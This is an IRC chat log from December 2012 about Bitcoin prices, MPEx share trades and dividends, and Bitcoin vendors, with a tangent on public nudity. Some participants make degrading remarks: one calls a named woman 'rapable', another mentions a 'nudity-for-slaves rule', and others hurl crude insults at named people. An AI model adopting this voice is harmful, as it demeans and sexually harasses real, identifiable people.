918 @ 0.000524 = 0.481 BTC [+] Dec 04 13:41:17 [MPEX] [S.MPOE] 7361 @ 0.00052418 = 3.8585 BTC [+] Dec 04 14:07:01 [MPEX] [S.MPOE] 4321 @ 0.00052395 = 2.264 BTC [-] Dec 04 14:07:02 [MPEX] [S.MPOE] 17529 @ 0.00052418 = 9.1884 BTC [+] Dec 04 14:22:23 [MPEX] [S.MPOE] 9710 @ 0.00052418 = 5.0898 BTC [+] Dec 04 14:22:25 [MPEX] [S.MPOE] 4992 @ 0.00052431 = 2.6174 BTC [+] Dec 04 14:22:26 [MPEX] [S.MPOE] 13248 @ 0.00052436 = 6.9467 BTC [+] Dec 04 14:37:34 http://www.youtube.com/watch?v=px2Ssct-U1o&t=1m27s Dec 04 14:37:50 dopeness byond beliefness Dec 04 14:41:47 [MPEX] [S.DICE] 6967 @ 0.00339667 = 23.6646 BTC [+] Dec 04 14:41:49 [MPEX] [S.DICE] 250 @ 0.00339377 = 0.8484 BTC [-] Dec 04 14:43:15 dub: woah shit Dec 04 14:44:58 [MPEX] [S.MPOE] 4321 @ 0.00052032 = 2.2483 BTC [-] Dec 04 14:44:59 [MPEX] [S.MPOE] 14300 @ 0.00052021 = 7.439 BTC [-] Dec 04 14:45:01 [MPEX] [S.MPOE] 9166 @ 0.00051862 = 4.7537 BTC [-] Dec 04 14:45:01 [MPEX] [S.MPOE] 4663 @ 0.00051588 = 2.4055 BTC [-] Dec 04 14:48:27 dub: now that is mad skills Dec 04 14:51:43 hmm Dec 04 14:51:55 whats that keyboard they have on the techincs Dec 04 14:52:08 ;;ticker Dec 04 14:52:09 BTCUSD ticker | Best bid: 12.75000, Best ask: 12.78998, Bid-ask spread: 0.03998, Last trade: 12.78999, 24 hour volume: 33686.06210018, 24 hour low: 12.49010, 24 hour high: 12.79701, 24 hour vwap: 12.62702 Dec 04 14:52:10 never seen it before Dec 04 15:17:29 https://www.youtube.com/watch?v=eu6ioKjZsGU&feature=endscreen Dec 04 15:25:01 [MPEX] [S.MPOE] 4321 @ 0.00052425 = 2.2653 BTC [+] Dec 04 15:25:02 [MPEX] [S.MPOE] 1902 @ 0.00052436 = 0.9973 BTC [+] Dec 04 15:25:04 [MPEX] [S.MPOE] 26527 @ 0.00052443 = 13.9116 BTC [+] **** BEGIN LOGGING AT Tue Dec 4 22:18:32 2012 Dec 04 22:26:23 [MPEX] [S.MPOE] 4321 @ 0.00051423 = 2.222 BTC [+] Dec 04 22:26:24 [MPEX] [S.MPOE] 18004 @ 0.00051454 = 9.2638 BTC [+] Dec 04 22:28:46 kakobrekla: btw https://bitcointalk.org/index.php?topic=49417.msg1377884#msg1377884 Dec 04 22:28:54 in case you didnt see it Dec 04 22:29:05 yup Dec 04 22:29:09 drama ? Dec 04 22:29:16 not much Dec 04 22:29:23 ;;ticker Dec 04 22:29:24 BTCUSD ticker | Best bid: 13.18899, Best ask: 13.18900, Bid-ask spread: 0.00001, Last trade: 13.18900, 24 hour volume: 45398.29533466, 24 hour low: 12.52550, 24 hour high: 13.24000, 24 hour vwap: 12.84589 Dec 04 22:29:30 rally. Dec 04 22:29:58 good afternoon mircea_popescu Dec 04 22:30:20 ya Dec 04 22:30:22 heya giga Dec 04 22:30:25 its a good afternoon Dec 04 22:30:27 o wow 13! Dec 04 22:30:28 mwahaha. Dec 04 22:30:38 i STILL have those futures bought at 10.66 on icbit Dec 04 22:30:50 i figured once coin choke started to hit, it would go up Dec 04 22:30:53 it'll be so fucking funny on the 12th. i guess btcjam for them ? Dec 04 22:31:22 ukto tbh i was thinking it'd hit sooner (so did many people, to wit the november options slate) Dec 04 22:31:31 [MPEX] [S.MPOE] 4321 @ 0.00052435 = 2.2657 BTC [+] Dec 04 22:31:32 [MPEX] [S.MPOE] 13301 @ 0.00052443 = 6.9754 BTC [+] Dec 04 22:31:42 everyone was holding thoguh, with teh same expectation Dec 04 22:31:50 since everyone held their breath Dec 04 22:31:52 nothing happened Dec 04 22:32:01 now ppl are starting to let go, but have less and less to let go Dec 04 22:32:15 whats up with btcjam ? Dec 04 22:32:50 btcjam = comedy gold Dec 04 22:32:56 lol Dec 04 22:40:26 Ukto i was just saying, the icbit people will have to get the 2,3,500 btc they'll owe me somehow. Dec 04 22:40:34 btcjam seems a natural choice. Dec 04 22:40:51 lol Dec 04 22:41:05 didnt think btcjam was making any real progress last i looked atit Dec 04 22:41:32 depends how you define it. pigeons seems happy :p Dec 04 22:41:51 unrelatedly, im curious who's the first person to sue/get sued in the rota thingee. Dec 04 22:41:56 pigeons is always happy :P Dec 04 22:42:00 unless pirate is around :P Dec 04 22:42:02 j/k Dec 04 22:42:11 rota? Dec 04 22:43:05 ;;google mpex rota Dec 04 22:43:06 The MPEx Rota pe Trilema - Un blog de Mircea Popescu.: ; How does one list on MPEx ? pe Trilema - Un blog de Mircea ...: ; Why S.MPOE is worth more than MtGox pe Trilema - Un blog de ...: Dec 04 22:43:19 wow nice list. but anyway, 1st one Dec 04 22:43:38 ahhh Dec 04 22:43:54 actually Dec 04 22:43:57 now that I look at btcjam Dec 04 22:44:01 i think its more of what I was wanting to do Dec 04 22:44:10 there was a lending site I saw Dec 04 22:44:24 that let ppl invest in ppl for loans etc like that Dec 04 22:44:33 however, you got shares Dec 04 22:44:39 for every $25 you put in Dec 04 22:44:45 and could then trade the shares if you wanted Dec 04 22:45:36 rota? Dec 04 22:45:57 EskimoBob see above neh ? Dec 04 22:46:07 but i'm curious now, does anyone even get the rota reference ? Dec 04 22:46:07 wtf is "rota" ? Dec 04 22:46:14 lolk. Dec 04 22:46:28 what is the meaning of this word? Dec 04 22:47:01 http://en.wikipedia.org/wiki/Rota LOL! Dec 04 22:47:49 it's a reference to the oldest court system still in functional use to this day Dec 04 22:47:55 closing in on a thousand years by now. Dec 04 22:48:38 "The Wheel of Fortune"? Dec 04 22:48:55 "Tribunal Apostolicum Rotae Romanae" Dec 04 22:48:59 look that up. Dec 04 22:49:16 military police force in São Paulo ? Dec 04 22:50:24 I am not going to even comment on that bull shit. You ar Dec 04 22:51:22 http://marthamitchelleffect.org/#/assange-case-aa-cuba/4571327129 Dec 04 22:51:37 that anna arden is certainly very rapable Dec 04 22:51:45 i've never been called an ar before ?! Dec 04 22:52:40 dub she strikes me as a sort of michael moore Dec 04 22:53:02 anonymous loser trying to cling to what she imagines is "famous people" to "become famous" herself. Dec 04 22:55:10 she should just "leak" a sex tape Dec 04 23:11:09 Someone should probably buy that 16k S.BVPS shares I couldn't afford. Dec 04 23:11:52 lol are you cornerning the market ? Dec 04 23:12:06 so mircea_popescu ia the pope of bitcoin Dec 04 23:12:13 I think there's around 200k circulating and I own 130k already. Dec 04 23:12:31 iirc the issue was 300k ? 350k ? something like that Dec 04 23:12:37 FabianB hence POPEscu Dec 04 23:12:46 heh Dec 04 23:12:47 500k Dec 04 23:12:57 1/2 of the 1 million total shares Dec 04 23:13:08 RG sold ~175-250k maybe. Dec 04 23:13:17 Not sure of the exact amount. Dec 04 23:14:24 to offer in this IPO a total of 150`000 (one hundred thousand) shares, as follows : one block of 30`000 (thirty thousand) shares at a price of 0.0022 BTC each ; one block of 75`000 (seventy-five thousand) shares at a price of 0.0024 BTC each ; one block of 45`000 (fourty-five thousand) shares at a price of 0.0026 BTC each. Dec 04 23:14:34 a right you are. was 150k originally + whatever he sold after that if anything Dec 04 23:16:27 Aye Dec 04 23:16:48 He might be the one who bought shares and sold back at 0.00349 Dec 04 23:16:59 From which there's 16k left. Dec 04 23:17:20 He said he was buying shares around 0.003 and putting them back for sale. Dec 04 23:18:00 where ? he's been awful quiet of late. Dec 04 23:18:17 Ah, many weeks ago. Dec 04 23:18:23 Maybe 1-2 months ago Dec 04 23:18:48 a a Dec 04 23:19:17 S.BVPS is a good stock anyway. Dec 04 23:19:30 !ticker s.bvps Dec 04 23:19:31 [MPEX:S.BVPS] 1day: 0.00349995 / 0.00349995 / 0.00349995 (83964 shares, 293.87 BTC), 30day: 0.002 / 0.00303219 / 0.00349995 (182572 shares, 553.59 BTC) Dec 04 23:19:49 ;;calc 50/0.00349995 Dec 04 23:19:50 14285.9183703 Dec 04 23:19:50 If I had been quicker, could have paid them 0.003 instead of 0.0035 Dec 04 23:19:58 makes what, 1.4% a month ? pretty sweet. Dec 04 23:21:10 50 BTC / 500 000 issued on mpex = 0.0001BTC per share or 1/35 Dec 04 23:21:23 2.8% Dec 04 23:21:52 The div is paid on 500k shares only. Dec 04 23:22:29 o right you are. Dec 04 23:22:48 so wait, this is like, 35% a year ? heh. Dec 04 23:22:59 bitcoin still has crazy rates. Dec 04 23:23:04 That's assuming no growth of profit. Dec 04 23:24:03 down to 1 partner not awol, and just barely Dec 04 23:24:37 ? Dec 04 23:25:00 grubles is mia, rg has a job Dec 04 23:25:29 Yes, he has. Dec 04 23:25:38 But he's still around. Dec 04 23:25:52 I talked to him the other day. Dec 04 23:26:04 He's just not as active as usual. Dec 04 23:28:07 i was talking to grubles maybe i dunno, a month ago ? Dec 04 23:28:19 He's moving with a new provider and getting a new design rolled out too for the website. Dec 04 23:29:22 Should get him 24/7 support for his customers and automatic provision of VPSes instead of manual. Dec 04 23:30:13 Otherwise, as far as I know, customer amounts stay stable, not really moving much. Dec 04 23:30:22 A bit sad but eh. Dec 04 23:31:23 Haven't seen grubles talking at all lately. Dec 04 23:32:23 [16:30] grubles was last seen in #bitcoin-otc 5 weeks, 5 days, 2 hours, 22 minutes, and 31 seconds ago: gribble, stop hitting yourself Dec 04 23:32:23 [16:31] grubles was last seen in #bitcoin-hosting 27 weeks, 2 days, 15 hours, 48 minutes, and 45 Dec 04 23:33:47 eh, looks like he want on vacation somewhere in the savannah or something and got lost or eaten. Dec 04 23:33:53 he went* Dec 04 23:38:39 thats good news.. [15:39] Dec04 21:37:11 mtgox x31 410.2572 @ 13.36583058 USD Dec 04 23:38:54 ? Dec 04 23:39:04 price went up more past 13.20 Dec 04 23:39:23 curious how high the rally will get today Dec 04 23:41:50 13.38! Dec 04 23:42:16 Damn... maybe I should have sold options instead of buying S.BVPS Dec 04 23:42:19 Puts Dec 04 23:45:17 [MPEX] [S.MPOE] 13650 @ 0.00051548 = 7.0363 BTC [-] Dec 04 23:46:28 http://trilema.com/2012/so-do-i-hate-the-state-or-what/ Dec 04 23:46:32 if anyone's in a reading mood. Dec 05 00:08:39 [MPEX] [S.MPOE] 2490 @ 0.00051475 = 1.2817 BTC [-] Dec 05 00:23:11 [MPEX] [S.DICE] 1950 @ 0.00327747 = 6.3911 BTC [-] Dec 05 00:23:12 [MPEX] [S.DICE] 4900 @ 0.00327078 = 16.0268 BTC [-] Dec 05 00:23:14 [MPEX] [S.DICE] 50 @ 0.00323801 = 0.1619 BTC [-] Dec 05 00:26:02 Namjies, how much S.BVPS did u buy? Dec 05 00:27:33 I sold you the S.BVPS. Nice profit on that trade. Dec 05 00:27:55 Was worried I cornered the market, thought the float was only 150K. Dec 05 00:28:11 o hi Buglouse Dec 05 00:28:14 oops. Bugpowder Dec 05 00:28:42 dive dive dive Dec 05 00:28:47 ;;ticker Dec 05 00:28:48 BTCUSD ticker | Best bid: 13.30041, Best ask: 13.30939, Bid-ask spread: 0.00898, Last trade: 13.30939, 24 hour volume: 60464.88859745, 24 hour low: 12.55000, 24 hour high: 13.50000, 24 hour vwap: 12.98665 Dec 05 00:28:53 eh seems not. Dec 05 00:29:15 had this happened a week ago i'd be out Dec 05 00:30:38 ;;calc 42000*4/13.3 - 42000*3/12.3 Dec 05 00:30:39 2387.67650834 Dec 05 00:30:44 2.5k btc as a rough estimate. Dec 05 00:32:05 bond holders cough Dec 05 00:32:13 well ya Dec 05 00:32:15 but still. Dec 05 00:32:32 a no. last month i covered on my own money, like 25k of the 41k capital Dec 05 00:32:55 yeah I noticed that change from "lender of last resort" Dec 05 00:33:09 what you mean change ? Dec 05 00:33:44 As I recall a few months ago, you contribution was listed differently in the MPOE bondholders results. Dec 05 00:34:03 something like 6. mircea_popescu lender of last resort Dec 05 00:34:17 iirc it's always been the same Dec 05 00:34:23 [MPEX] [S.MPOE] 1831 @ 0.00051475 = 0.9425 BTC [-] Dec 05 00:34:24 [MPEX] [S.MPOE] 1725 @ 0.00051474 = 0.8879 BTC [-] Dec 05 00:34:26 [MPEX] [S.MPOE] 6879 @ 0.00051362 = 3.5332 BTC [-] Dec 05 00:34:26 [MPEX] [S.MPOE] 12915 @ 0.00051094 = 6.5988 BTC [-] Dec 05 00:34:45 mokay Dec 05 00:35:15 i wonder if we see 15 for xmas Dec 05 00:35:44 It is the perfect christmas gift Dec 05 00:35:46 bruce wagner says 50 Dec 05 00:36:02 I think we see 15... Not sure if we will HOLD it though. Dec 05 00:36:24 Although I think we are finally running out of things that can blow up to create panic sales. Dec 05 00:36:42 Unless..... MPEx! Dec 05 00:37:21 nah. Dec 05 00:37:25 mpex doth not blow up this year. Dec 05 00:37:40 as long as mtgox holds o fuck Dec 05 00:37:42 bfl ;/ Dec 05 00:37:47 yeah Dec 05 00:37:50 mtgox Dec 05 00:37:59 bfl, who cares. Dec 05 00:38:12 you kidding ? they have something like 1mn in "preorders" Dec 05 00:38:38 how is that money going to recycle back into the economy? Dec 05 00:38:41 hmmm Dec 05 00:38:57 i tell you, if some of the larger players get burned on bfl they might just go out. Dec 05 00:39:00 that's a bunch of coin Dec 05 00:39:12 yeah Dec 05 00:39:33 gigavps had what, 4 rigs or something ? Dec 05 00:39:54 that's already a messed up situation Dec 05 00:40:00 if he's out the 5-10k btc there on top of the recent glbse crapfest + whatever lawyer cost etc Dec 05 00:40:05 he might just say fuck it Dec 05 00:40:48 one example picked out of what, a dozen or two people. Dec 05 00:41:03 pigeons is bruce still around ?! Dec 05 00:41:49 do you think the deepbit problem is why the hash rate is down? Dec 05 00:42:02 im possibly the cluelest veteran when it comes to mining. Dec 05 00:42:46 i think even gmaxwell may be more knowledgeable. Dec 05 00:44:46 bruce's site: http://buybitcoin.com/home/faq/#16 Dec 05 00:45:54 https://bitcointalk.org/index.php?topic=106027.0;all Dec 05 00:46:02 http://i46.tinypic.com/2iuqfrd.jpg Dec 05 00:46:05 done. Dec 05 00:46:10 oty Dec 05 00:47:07 I bought 80k+ recently Dec 05 00:50:48 Bringing my total to 136k Dec 05 00:52:21 note to phishers ^^^ Dec 05 00:54:10 lol how's they gonna phish ? Dec 05 00:55:03 Namjies, how much would you have spent for the stock? Dec 05 00:55:15 just curious Dec 05 00:55:27 lol seller's remorse Dec 05 00:56:12 pigeons "If you make a payment to us by an unauthorized method, your best recourse would be to contact the financial institution or the payment provider company you used, and request that they reverse the transaction." Dec 05 00:56:29 20% profit, no remorse here. Dec 05 00:56:29 that's the first time i've seen a merchant begging for this. Dec 05 00:56:57 well he's unique Dec 05 00:57:08 sellers remorse is the 1.3M of S.MPOE @ 38000 Dec 05 00:57:09 Bugpowder, would have skipped if higher. Dec 05 00:57:17 I was late to buy around 0.003 Dec 05 00:57:23 ahaha you did that did you ? Dec 05 00:57:29 yessss Dec 05 00:57:29 !ticker s.mpoe Dec 05 00:57:30 [MPEX:S.MPOE] 1day: 0.00050368 / 0.00051623 / 0.00052443 (1249621 shares, 645.09 BTC), 30day: 0.00047 / 0.00050943 / 0.00053881 (97679619 shares, 49,761.45 BTC) Dec 05 00:57:31 I fucked up Dec 05 00:57:40 I am just getting over the depression Dec 05 00:57:49 It would have made up for all the fucked up F.GIGA losses Dec 05 00:57:54 so ended up having to cough up the BTC at 0.0035 Dec 05 00:58:01 ;;calc (0.00051623 - 0.00038000) * 13000000 Dec 05 00:58:01 1770.99 Dec 05 00:58:04 the cost of exiting MPCD.B and C Dec 05 00:58:07 eh, what's a coupla k btcs Dec 05 00:58:08 Otherwise I'd have created puts and sold those puts. Dec 05 00:58:08 prior to implosion Dec 05 00:58:15 [MPEX] [S.MPOE] 4321 @ 0.00051096 = 2.2079 BTC [+] Dec 05 00:58:16 [MPEX] [S.MPOE] 6825 @ 0.00051094 = 3.4872 BTC [-] Dec 05 00:58:18 [MPEX] [S.MPOE] 10554 @ 0.00050909 = 5.3729 BTC [-] Dec 05 00:58:18 Which can be very profitable right now. Dec 05 01:00:05 Namjies the 5k pair is up like 5 cents per. Dec 05 01:00:20 hey now http://buybitcoin.com/home/price/ Dec 05 01:00:48 17.86 ?! wtf is this ? Dec 05 01:01:10 You can simply take the number of Bitcoins you need… and multiply it by this number, to see how many dollars you need. Dec 05 01:01:16 this guy... is he on some sort of meds ? Dec 05 01:01:58 A Reputation you can Trust: The founder of BuyBitcoin.com, Bruce Wagner, is the most famous person in the Bitcoin world, and is considered to be an expert on Bitcoin, and the Bitcoin Economy. Dec 05 01:02:32 oic. Dec 05 01:02:57 Scoundrel "Bitconman" McFuckerscammer's Fine Digital Coins Shop, LLC. Dec 05 01:03:01 Is what it is. Dec 05 01:03:13 lol Dec 05 01:03:23 he could just call it mybitcoin.com and be done with it Dec 05 01:03:31 well you can't say you didn't know where he wanted to fuck you Dec 05 01:03:53 Well... its cheaper than the physicals at memorydealers.com Dec 05 01:04:18 http://memorydealers.com/hardware/bitcoin-equipment.html Dec 05 01:04:27 “I’m very pleased with my bitcoin purchase, everything was smooth. Amazing that you even process bank deposits on Saturdays and Sundays too!” Dec 05 01:05:21 ugh. Dec 05 01:05:35 Bugpowder well ya but custom rounds are always expensive. Dec 05 01:05:44 What are your daily transaction limits? I would be interested in large USD deposits to your bank account.” Dec 05 01:05:47 doesn't make sense to run one for less than a few million pieces, so. Dec 05 01:06:03 pigeons in other news, http://polimedia.us/dtng/c/src/135466230861.jpg Dec 05 01:06:15 naw dude Dec 05 01:06:29 casacius sells them direct for like 1BTC over face. Dec 05 01:07:22 25 Casascius Bitcoins SEE DETAILS $221.11 Dec 05 01:07:26 221.11 / 25 Dec 05 01:07:30 ;;calc 221.11 / 25 Dec 05 01:07:30 8.8444 Dec 05 01:07:32 I just wonder if BitVPS will really improve in term of customers now after the changes. Dec 05 01:07:38 seems a pretty good deal, that Dec 05 01:08:01 Namjies: he's gotta migrate everyone to openvz, doesn't sound fun Dec 05 01:08:04 obviously not updated in a long time Dec 05 01:08:13 He's switching to Xen Dec 05 01:08:26 Actually... the 10BTC silver one is not horrible either. Dec 05 01:08:29 And not migrating everyone. Dec 05 01:08:40 It used to be 2x BTC price... Dec 05 01:08:44 Old boxes on international servers will be kept. Dec 05 01:08:48 Bugpowder i like the Shop by Price $0.00 - $1,000.00 (5) $1,000.00 - $2,000.00 (1) part best. Dec 05 01:09:06 The new, automatically provisioned VPSes will be on Xen with a specific provider tho. Dec 05 01:09:07 ok but domestic kvm folks will probably leave Dec 05 01:09:13 Bugpowder: is your name a bomb the bass reference? Dec 05 01:09:41 yeah, that and naked lunch Dec 05 01:09:42 did rg eventually make a blog anywhere ? Dec 05 01:09:45 gtg Dec 05 01:09:49 oh yeah Dec 05 01:10:10 hmm, I don't know Dec 05 01:11:12 people w/o blogs really have no idea how useful one is. Dec 05 01:11:24 get off my lawn Dec 05 01:11:54 lol Dec 05 01:12:24 In your case, useful to hear yourself speak? Dec 05 01:12:56 Doesn't look like people are reading your blog much. No comments. We only get to read something when you link us to it. Dec 05 01:13:16 I have a feeling it lacks audience. Dec 05 01:13:24 I had one once and scrapped it. Dec 05 01:13:42 so many false implications in there tho... Dec 05 01:14:31 Possibly eh Dec 05 01:14:54 I don't see visitors stats Dec 05 01:14:58 for one, how many times do people comment on your clothes ? and is this an argument in favour of going around naked ? Dec 05 01:15:13 I wouldn't mind going around naked. Dec 05 01:15:25 for another, people make a lot of comments on btctalk. Dec 05 01:15:52 Not always good, but blog usually do get a few comments ever 100-200 readers. Dec 05 01:15:57 suppose you could have a btctalk that consisted of only the 0.1% of comments worth reading from the 1% of people you actually think anything of. Dec 05 01:16:17 now he's made me look Dec 05 01:17:03 Something like 10% of the population should just go one day to work naked and keep it like that. Instant impossibility to apply nudity ban. Dec 05 01:17:09 330 past month. would that mean what, 10k readers ? Dec 05 01:17:44 Namjies i do have a nudity-for-slaves rule in place, but it's one thing to have nubile young women naked around the house Dec 05 01:17:53 and quite another to have the general population in say the bus Dec 05 01:18:14 I'm just saying, if the population wanted, repealing laws would be easy. Dec 05 01:18:46 prolly a good idea to pick more sensible laws to repeal. Dec 05 01:18:54 fwiw nudity isn't even illegal, just mostly impractical. Dec 05 01:19:11 It's technically going to get you arrested. Dec 05 01:19:23 i guess it depends where. Dec 05 01:19:24 It's not legal to go around public places naked. Dec 05 01:19:27 never happened to me. Dec 05 01:19:33 Not in Canada/US Dec 05 01:19:40 a well. i'm talking of the civilised world. Dec 05 01:19:47 otherwise sure, in iran it may get you stoned. Dec 05 01:20:11 I guess Canada/US is not part of the civilized world. Dec 05 01:20:53 well... it aspires to be. maybe one day. Dec 05 01:22:36 It's usually acknowledged the human body is not in itself indecent. Dec 05 01:23:17 If we ban public nudity based on the fact it can bother some to see it, we might as well ban breathing because some could be bothered by seeing it. Dec 05 01:23:17 in the us you mean ? Dec 05 01:23:34 Or anything else someone might not want to see. Dec 05 01:23:40 again, nudity is not banned afaik. causing a disturbance is, which i can see the point. Dec 05 01:24:01 Well someone seeing something not directed at them is not disturbance. Dec 05 01:24:23 ya ya, but if people start crowding and blocking the road and stampeding each other this'd be a problem. Dec 05 01:24:27 it has to be adressed somehow. Dec 05 01:24:43 That yes. Dec 05 01:25:04 But even not doing anything particuliar. Dec 05 01:25:34 Try just walking on the sidewalk naked. You'll get arrested. Dec 05 01:25:46 Someone will complain and police will show up. Dec 05 01:25:50 no in san francisco Dec 05 01:25:52 people are funny anyway. last time i took the girls out for a shoot last winter there were some people happening to walk their dogs now and again. Dec 05 01:25:52 not* Dec 05 01:26:01 the dogs on seeing nude women were moderately interested, as in, hallo ? Dec 05 01:26:12 the owners however were trying very hard NOT TO LOOK Dec 05 01:26:33 had a laugh at the dichotomy there. Dec 05 01:26:51 Nice. Although I'm not surprised for San Francisco. Dec 05 01:27:17 im in timisoara. Dec 05 01:29:36 but in any case, people tend to confuse things. police gets called cause "omg naked person", they have to show up (cause they were called, it's how it works) Dec 05 01:29:57 the officer then talks to the person in question. if the guy gets all beligerent yea he's getting arrested. was he arrested for being naked ? well... not really. Dec 05 01:31:48 Hmm, I wonder about that. Dec 05 01:32:13 Maybe in Romania, but in the US/Canada? Dec 05 01:33:13 well, you keep insisting on discussing places which have no rule of law. Dec 05 01:33:20 in the us/canada whatever the cop feels like will happen. Dec 05 01:33:30 the person gets raped, maybe, the person gets arrested for conspiracy, maybe, Dec 05 01:33:32 fuckall knows. Dec 05 01:33:35 Probably. Dec 05 01:34:28 wait a second! Dec 05 01:34:55 Dec 04 02:25:56 Stop putting /dtng/ links in here. Dec 05 01:35:04 had a change of heart ?! Dec 05 01:36:03 No. I just tend to click all links before checking them and I'm not particularly interested in seeing intercourse. Dec 05 01:36:52 but on the other hand... Dec 05 01:37:17 ah, I suppose. Dec 05 01:37:55 If we allow public nudity... Dec 05 01:39:07 Same goes for everything else as long as it's not directly aimed at someone. Dec 05 01:42:18 Although I suppose it's more the lack of warning that bothers me. I stay around for bitcoin * asset news and you always present the links as "In other news/This is interesting/etc." Dec 05 01:42:41 "and now for something competely different" Dec 05 01:43:44 http://ubuntuforums.org/showthread.php?t=928710 Dec 05 01:43:48 isnt this a little lulzy ? Dec 05 01:45:25 that there's a database error? Dec 05 01:46:32 [MPEX] [S.MPOE] 4321 @ 0.00050942 = 2.2012 BTC [+] Dec 05 01:46:33 [MPEX] [S.MPOE] 8677 @ 0.00050909 = 4.4174 BTC [-] Dec 05 01:46:34 [MPEX] [S.MPOE] 1402 @ 0.00050631 = 0.7098 BTC [-] Dec 05 01:47:15 is the latest flash completely fucking broken Dec 05 01:47:17 ubuntuforums be down Dec 05 01:47:23 dub traditionally yes. Dec 05 01:47:35 moreso than usual Dec 05 01:48:20 also traditionally yes. Dec 05 01:55:10 bah ubuntu fucked up grep Dec 05 01:55:17 -Ucp8 means jack shit now. Dec 05 01:59:21 thats what you get with riceOS Dec 05 02:02:36 lol Dec 05 02:03:07 [MPEX] [S.MPOE] 5450 @ 0.00050631 = 2.7594 BTC [-] Dec 05 02:03:59 never help people Dec 05 02:04:43 I build one little house for these habitat for humanity fucks and they hound me till I die Dec 05 02:06:42 yep. Dec 05 02:06:49 charities are worse than the mob. Dec 05 02:18:28 [MPEX] [S.MPOE] 4321 @ 0.00051542 = 2.2271 BTC [+] Dec 05 02:18:29 [MPEX] [S.MPOE] 6550 @ 0.00051548 = 3.3764 BTC [+] Dec 05 02:18:31 [MPEX] [S.MPOE] 17200 @ 0.00051941 = 8.9339 BTC [+] Dec 05 02:18:32 [MPEX] [S.MPOE] 9259 @ 0.00052443 = 4.8557 BTC [+] Dec 05 02:22:40 [MPEX] [S.MPOE] 4321 @ 0.00051463 = 2.2237 BTC [-] Dec 05 02:22:42 [MPEX] [S.MPOE] 21845 @ 0.00051433 = 11.2355 BTC [-] Dec 05 02:38:23 [MPEX] [S.MPOE] 4321 @ 0.00051604 = 2.2298 BTC [+] Dec 05 02:38:25 [MPEX] [S.MPOE] 1650 @ 0.00051607 = 0.8515 BTC [+] Dec 05 02:40:41 [MPEX] [S.MPOE] 4321 @ 0.00052232 = 2.2569 BTC [+] Dec 05 02:40:43 [MPEX] [S.MPOE] 19618 @ 0.00052237 = 10.2479 BTC [+] Dec 05 02:40:44 [MPEX] [S.MPOE] 672 @ 0.00052443 = 0.3524 BTC [+] Dec 05 03:01:48 [MPEX] [S.MPOE] 4321 @ 0.00051789 = 2.2378 BTC [-] Dec 05 03:01:49 [MPEX] [S.MPOE] 13729 @ 0.00051774 = 7.1081 BTC [-] Dec 05 03:01:51 [MPEX] [S.MPOE] 350 @ 0.00051547 = 0.1804 BTC [-] Dec 05 03:02:34 [MPEX] [S.MPOE] 4321 @ 0.00051553 = 2.2276 BTC [+] Dec 05 03:02:35 [MPEX] [S.MPOE] 14230 @ 0.00051547 = 7.3351 BTC [-] Dec 05 03:04:30 [MPEX] [S.MPOE] 4321 @ 0.00052302 = 2.26 BTC [+] Dec 05 03:04:31 [MPEX] [S.MPOE] 10780 @ 0.00052332 = 5.6414 BTC [+] Dec 05 03:05:05 [MPEX] [S.MPOE] 4321 @ 0.00051572 = 2.2284 BTC [-] Dec 05 03:05:07 [MPEX] [S.MPOE] 6779 @ 0.00051547 = 3.4944 BTC [-] Dec 05 03:13:23 [MPEX] [S.MPOE] 4321 @ 0.00052308 = 2.2602 BTC [+] Dec 05 03:13:24 [MPEX] [S.MPOE] 13153 @ 0.00052332 = 6.8832 BTC [+] Dec 05 03:13:55 [MPEX] [S.MPOE] 4321 @ 0.00052298 = 2.2598 BTC [-] Dec 05 03:13:55 [MPEX] [S.MPOE] 5217 @ 0.00052332 = 2.7302 BTC [+] Dec 05 03:13:56 [MPEX] [S.MPOE] 7162 @ 0.00052443 = 3.756 BTC [+] Dec 05 03:25:16 [MPEX] [S.MPOE] 4321 @ 0.00052441 = 2.266 BTC [-] Dec 05 03:25:17 [MPEX] [S.MPOE] 3179 @ 0.00052443 = 1.6672 BTC [+] Dec 05 03:25:18 [MPEX] [S.MPOE] 7000 @ 0.00052446 = 3.6712 BTC [+] Dec 05 03:25:19 [MPEX] [S.MPOE] 5157 @ 0.00052446 = 2.7046 BTC [+] Dec 05 03:31:03 [MPEX] [S.MPOE] 5900 @ 0.00052446 = 3.0943 BTC [+] Dec 05 03:36:55 [MPEX] [S.MPOE] 19643 @ 0.00052446 = 10.302 BTC [+] Dec 05 03:36:57 [MPEX] [S.MPOE] 5707 @ 0.00052459 = 2.9938 BTC [+] Dec 05 03:41:07 [MPEX] [S.MPOE] 3942 @ 0.00052459 = 2.0679 BTC [+] Dec 05 03:41:09 [MPEX] [S.MPOE] 17358 @ 0.00052461 = 9.1062 BTC [+] Dec 05 03:47:29 mircea_popescu: here's your boy http://www.youtube.com/watch?v=I-DVOYyx_6U Dec 05 03:48:54 what, still ?! Dec 05 03:49:46 it boggles how inept someone must be to try and leech bitcoin creed off genjix. Dec 05 03:56:08 wait, what? Dec 05 03:57:22 nothing, i just knew linking to a genjox video for rile mircea_popescu up Dec 05 03:57:54 http://www.youtube.com/watch?v=ZmpluH6-ScM Dec 05 03:58:22 mircea_popescu: who is the guy speaking in the first video? Dec 05 03:58:37 taaki aka genjix Dec 05 03:58:49 ahh Dec 05 03:58:52 so thats the face of the man Dec 05 03:59:36 i dunno who were the other schmucks around there, but i guess yet another service going nowhere on half a mil of angel capital. Dec 05 04:00:10 [MPEX] [S.MPOE] 11542 @ 0.00052461 = 6.055 BTC [+] Dec 05 04:00:11 [MPEX] [S.MPOE] 8939 @ 0.00052465 = 4.6898 BTC [+] Dec 05 04:00:13 [MPEX] [S.MPOE] 7183 @ 0.00052467 = 3.7687 BTC [+] Dec 05 04:00:23 mircea_popescu: I dunno, is it wrong Im bitter? Dec 05 04:00:40 a nm, found it http://www.miicard.com/ Dec 05 04:00:46 "The only way to prove you are who you say you are purely online" Dec 05 04:01:04 sorta like, you know, retarded pgp implementation that fails to work i bet. Dec 05 04:01:14 yeah I find it funny Dec 05 04:01:23 why do people keep implementing things again and again Dec 05 04:01:32 like, just to say reinventing the wheel doesnt cover it Dec 05 04:02:04 because there's some idiots who think they too can be "investors" in "technology" Dec 05 04:02:18 even if they don't understand either capital or engineering. Dec 05 04:02:26 sorta like the bitcointalk forum, lending section. Dec 05 04:02:28 I dont even mean the investment Dec 05 04:02:31 I meant the actually doing it Dec 05 04:02:40 these idiots keep pushing money out, and by now a sort of circus/sideshow act has developed Dec 05 04:02:56 sort of like the 419 nigerians, except these are usually poor inner city youths (with or without an acne problem) Dec 05 04:03:09 and they do... what you see in that youtube. cockgrabbing basically. Dec 05 04:03:36 mircea_popescu: maybe Im in the wrong business Dec 05 